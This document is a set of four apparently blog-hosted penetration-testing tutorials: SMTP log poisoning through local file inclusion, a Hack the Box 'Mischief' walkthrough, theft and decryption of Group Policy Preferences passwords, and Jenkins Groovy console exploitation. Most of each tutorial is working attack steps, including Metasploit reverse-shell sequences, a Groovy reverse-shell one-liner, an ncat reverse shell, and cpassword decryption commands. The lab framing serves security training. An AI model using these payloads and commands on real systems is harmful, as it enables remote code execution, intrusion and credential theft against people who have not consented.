SMTP Log Poisioning through LFI to Remote Code Exceution

Hello friends!! Today we will be discussing on SMTP log poisoning. But before getting in details, kindly read our previous articles for “SMTP Lab Set-Up” and “Beginner Guide to File Inclusion Attack (LFI/RFI)” . Today you will see how we can exploit a web server by abusing SMTP services if the web server is vulnerable to local file Inclusion.

Let’s Start!!

With the help of Nmap, we scan for port 25 and as result it shows port 25 is open for SMTP service.

nmap –p25 192.168.1.107

This attack is truly based on Local file Inclusion attack; therefore I took help of our previous article where I Created a PHP file which will allow the user to include a file through file parameter.

As a result, you can observe that we are able to access /etc/passwd file of victim machine.

Now if you are able to access the mail.log file due to LFI, it means the mail.log has read and write permission and hence we can infect the log file by injecting malicious code.

Now let’s try to enumerate further and connect to the SMTP (25) port

telnet 192.168.1.107 25

As we can see, we got connected to the victim machine successfully. Now let’s try to send a mail via command line (CLI) of this machine and send the OS commands via “RCPT TO” option. Since the mail.log file generates log for every mail when we try to connect with web server. Taking advantage of this feature now I will send malicious PHP code as fake user and it will get added automatically in mail.log file as new log.

MAIL FROM:

RCPT TO:

Note : We can ignore the 501 5.1.3 Bad recipient address syntax server response as seen in the above screenshot because ideally the internal email program of the server (victim machine), is expecting us to input an email ID and not the OS commands.

As our goal is to inject php into the logs and this stage it is called log file poisoning and we can clearly see that details of mail.log as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.

192.168.1.107/lfi/lfi.php?file=/var/log/mail.log &c=ifconfig

But you can observe its output in its source code as shown in the below image:

This is called SMTP log poisoning and through such type of vulnerability we can easily take reverse shell of victim’s machine.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.1.109

msf exploit (web_delivery)>set srvport  8888

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Paste the above copied malicious code inside URL as shown in given image and execute it as command.

When above code gets execute you will get meterpreter session 1 of targeted web server.

msf exploit (web_delivery)>sessions 1

meterpreter> sysinfo

Hack the Box: Mischief Walkthrough

Today we are going to solve another CTF challenge “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Penetration Methodologies

Scanning Network

·         TCP and UDP ports scanning (Nmap)

Enumeration

·         SNMP Service Enumeration (Nmap Script)

·         Obtain credential for port 3366 login

·         Identify IPv6 address (ENYX)

·         Scanning Ipv6 (Nmap)

Access Victim’s Shell

·         Abusing web server through Command Execution Panel

·         Obtain reverse Shell via ncat

·         Get user.txt flag

Privilege Escalation

·         Obtain root password from bash_history

·         Find root.txt flag

Scanning Network

Note: Since these labs are online available therefore they have a static IP. The IP of this lab is 10.10.10.92

Let’s start off with our nmap Aggressive scan to find out the open ports and services.

nmap –A 10.10.10.92

But as you can observe that here we didn’t obtain much information, therefore further I scan for UDP port and from its result we got port 161 is open for SNMP.

nmap –sU 10.10.10.92

Enumeration

Because we was knowing SNMP service is enable in the network, therefore I run nmap script command for snmp enumeration.

nmpa –p 161 –sC –sV –sU 10.10.10.92

Hmmm!! So here I found something very interesting and it looks like the login credential to be use as authentication for port 3366.

Let’s navigate to port 3366 in the web browser and enter the following credential.

Username: loki 

Password: godofmischiefisloki

Here, we were welcomed by following web page where it was holding another credential. Let’s dig out another way to utilize this credential for login.

We use a python script called Enyx to find the ipv6 address of the target machine. You can get the script from this link.

git clone https://github.com/trickster0/Enyx
python enyx.py 2c public 10.10.10.92

So as you can observe that we have enumerated IPv6 address of victim’s machine and further scan it using nmap command given below:

nmap -6

Hmmm!! So along with Port 22, this time it has also shown port 80 for HTTP services.

So we navigate to web browser and explore Target IPv6 address in the URL, it put a login page for command execution panel. So we try to login this page with the credential we found earlier but that wasn’t the valid credential.

Access Victim’s Shell

Further I try brute force for username and successfully get login with following combination:

Username: administrator

Password: trickeryanddeceit

Since it was Command Execution Panel where we can run arbitrary system commands, hence this was RCE which could be easily exploit and we can owned reverse shell of the target machine.

But before that, you must know Ipv6 address of your local machine for addressing your IP as listening IP.

For reverse shell, I use python reverse shell code from pentestmonkey, and modify lhost IP from our IPv6 address. Since it was both nodes belong to IPv6, therefore we need a listener which can establish reverse connection such as ncat, hence we start ncat listener on port 1234.

As soon we will execute the malicious python code, we will get reverse connection via ncat.

Great!! You can observe that, we have access of remote terminal and let’s try to find out user.txt file to complete our first task. We found the user.txt file in the /home/loki but unable to read it. Although, there was another interesting file “credentials” and here we found another credential.

As port 22 was running, therefore we connect to remote machine through ssh using following credential.

Username: loki 

Password: lokiisthebestnorsegod

ssh loki@10.10.10.92

And successfully found user.txt file this time as shown below.

Privilege Escalation

While exploring more, I found .bash_history file where I found one more credential for root user but loki doesn’t have permission to execute switch user command.

Therefore, we move back to www-data user shell to run switch user command and enter above password for root login, then try to find out root.txt file inside the root directory but there wasn’t any flag. Therefore with the help of find command we try to enumerate the path of root.txt.

find / -name root.txt

Booom!! We got the path of the root.txt file and as you can observe that we have successfully captured the last flag and finished this challenge.

Penetration Testing on Group Policy Preferences

Hello Friends!! You might be aware of Group Policy Preferences in Windows Server 2008 that allows system administrators to set up specific configurations. It can be used to create username and encrypted password on machines. But do you know, that a normal user can elevate privilege to local administrator and probably compromise the security of the entire domain because passwords in preference items are not secured.

Table of Content

§  What is Group Policy Preferences?

§  Why using GPP to create a user account is a bad Idea?

§  Lab Set-Up Requirement

§  Create an Account in Domain Controller with GPP

§  Exploiting Group Policy Preferences via Metasploit -I

§  Exploiting Group Policy Preferences via Metasploit -II

§  Gpp-Decrypt

§  GP3finder

What is Group Policy Preferences?

Group Policy preferences shortly term as GPP permit administrators to configure and install Windows and application settings that were previously unavailable using Group Policy. One of the most useful features of Group Policy Preferences (GPP) is the ability to store and moreover these policies can make all kinds of configuration changes to machines, like as:

§  Map drives

§  Create Local Users

§  Data Sources

§  Printer configuration

§  Registry Settings

§  Create/Update Services

§  Scheduled Tasks

§  Change local Administrator passwords

Why using GPP to create a user account is a bad Idea?

If you use Microsoft GPP to create a local administrator account, consider the safety consequences carefully. Since the password is stored in SYSVOL in a preferred item. SYSVOL is the domain-extensive share folder in the Active Directory accessed by all authenticated users.

All domain Group Policies are stored here: \\\SYSVOL\\Policies\

When a new GPP is created for the user or group account, it’ll interrelated with a Group.XML file created in SYSVOL with the relevant configuration information and the password is AES-256 bit encrypted. Therefore the password is not secure as all authenticated users have access to SYSVOL.

“In this article, we will be doing active directory penetration testing through Group Policy Preferences and try to steal store password from inside SYSVOL in multiple ways”.

Let’s Start!!

Lab Set-Up Requirement

§  Microsoft Windows Sever 2008 r2

§  Microsoft Windows 7/10 

§  Kali Linux

Create an Account in Domain Controller with GPP

On your Windows Server 2008, you need to create a new group policy object (GPO) under “Domain Controller” using Group Policy Management.

Now create a new user account by navigating to: Computer Configuration > Control Panel Settings > Local Users and Groups.

Then Right click in the “Local Users and Groups” option and select New > Local User.

Then you get an interface for new local user property where you can create a new user account.

As you can observe from the given below image, we had created an account for user “raaz”.

Don’t forget to update group policy configuration.

So as I had already discussed above, that, whenever a new gpp is created for the user or group account, it will associated with a Group.XML which is stored inside /SYSVOl.

From the image below, you can see the entire path that leads to the file Group.xml. As you can see, this xml file holds cpassword for user raaz within the property tags in plain text.

Exploiting Group Policy Preferences via Metasploit -I

As we know an authorized user can access SYSVOL and suppose I know the client machine credential, let say raj:Ignite@123 then with help of this I can exploit Group Policy Preference to get XML file. Metasploit auxiliary module lets you enumerates files from target domain controllers by connecting to SMB as rouge user.

This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsofts public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.

use auxiliary/scanner/smb/smb_enum_gpp

msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103

msf auxiliary(smb_enum_gpp) > set smbuser raj

msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123

msf auxiliary(smb_enum_gpp) > exploit

Hence you can observe, that it has dump the password:abcd@123 from inside Group.xml file for user raaz.

Exploiting Group Policy Preferences via Metasploit -II

Metasploit also provide a post exploit for enumerating cpassword, but for this you need to compromised target’s machine at least once and then you will be able to run below post exploit.

This module enumerates the victim machine's domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsofts public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked.

use post/windows/gather/credentials/gpp

msf post(windows/gather/credentials/gpp) > set session 1

msf post(windows/gather/credentials/gpp) > exploit

From the given below image you can observe, it has been found cpassword twice from two different locations:

§  C:\ProgramData\Microsoft\Group Policy\History\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

§  C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

Gpp-Decrypt

Another method is to connect with target’s machine via SMB and try to access /SYSVOL with the help smbclient. Therefore execute its command to access shared directory via authorized account and then move to following path to get Group.xml file: SYSVOL\sysvol\Pentes.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

smbclient //192.168.1.103/SYSVOL -U raj

As you can observe that, we have successfully transfer Group.xml in our local machine. As this file holds cpassword, so now we need to decrypt it.

For decryption we use " gpp- decrypt" which is embedded in a simple ruby script in Kali Linux which decrypts a given GPP encrypted string.

Once you got access to Group.xml file, you can decrypt cpassword with the help of following syntax:

Syntax: gpp-decrypt

gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dump password in plain text as shown below.

GP3finder

This is another script written in python for decrypting cpassword and you can download this tool from here.

Once you got access to Group.xml file, you can decrypt cpassword with the help of following syntax:

Syntax: gpp-decrypt

gp3finder.exe -D qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dump password in plain text as shown below.

PowerShell Empire

This another framework just like Metasploit where you need to access low privilege shell. once you exploit target machine then use privesc/gpp module to extract password from inside Group.xml file.

This module Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

aganets

usemodule privesc/gpp

execute

As a result, it dump password in plain text as shown below.

Windows Powsershell

There is another method to retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences locally with the help of powersploit “Get-GPPPaswword”. You can download the module from here, it is a pwoershell script which you need

Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.

Now run the following command in the powershell:

Import-Module .\Get-GPPPassword.ps1

Get-GPPPassword

As result you can observe that, it has dump the saved password from inside group.xml file.

Exploiting Jenikins Groovy Script Console in Multiple Ways

Hello Friends!! There were so many possibilities to exploit Jenikins however we were interested in Script Console because Jenkins has lovely Groovy script console that permits anyone to run arbitrary Groovy scripts inside the Jenkins master runtime.

Table of Content

§  Jenkin’s Groovy Script Console

§  Metasploit

§  revsh.groovy

§  Groovy executing shell commands -I

§  Groovy executing shell commands -II

Jenkin’s Groovy Script Console

Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful language which offers the ability to do practically anything Java can do including:

§  Create sub-processes and execute arbitrary commands on the Jenkins master and agents.

§  It can even read files in which the Jenkins master has access to on the host (like /etc/passwd)

§  Decrypt credentials configured within Jenkins.

§  Granting a normal Jenkins user Script Console Access is essentially the same as giving them Administrator rights within Jenkins.

Source : https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console

Metasploit

This module uses the Jenkins-CI Groovy script console to execute OS commands using Java.

use exploit/multi/http/jenkins_script_console

msf exploit(jenkins_script_console) > set rhost 192.168.1.106

msf exploit(jenkins_script_console) > set rport 8484

msf exploit(jenkins_script_console) > set targeturi /

msf exploit(jenkins_script_console) > set target 0

msf exploit(jenkins_script_console) > exploit

Metasploit uses command stager to exploit against command injection.

Hence, you can observe, that it has given meterpreter session of victim’s machine.

revsh.groovy

Suppose if you found Jenkins without login password or you are a normal user who has permission to access script console then you can exploit this privilege to get reverse shell of the machine. At Jenkins Dashboard go to Manage Jenkins and then select Script Console.

At script console, you have full privilege to run any program code, therefore I try to execute following piece of code which I had taken from Github to get reverse connection on my local machine via netcat listener.

String host="localhost";

int port=8044;

String cmd="cmd.exe";

Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

nc -lvp 1234

Once the above script will be executed, it will give netcat session of victim’s machine.

Groovy executing shell commands -I

Similarly with the help of following piece of code which I found from this here, I try to create RCE for executing OS command through groovy script console. 

def sout = new StringBuffer(), serr = new StringBuffer()

def proc = 'ipconfig'.execute()

proc.consumeProcessOutput(sout, serr)

proc.waitForOrKill(1000)

println "out> $sout err> $serr"

Groovy executing shell commands -II

Similarly, I found another very small piece of code to exploit Groovy Console from here, which will generate RCE and execute shell command.

def cmd = "cmd.exe /c dir".execute();

println("${cmd.text}");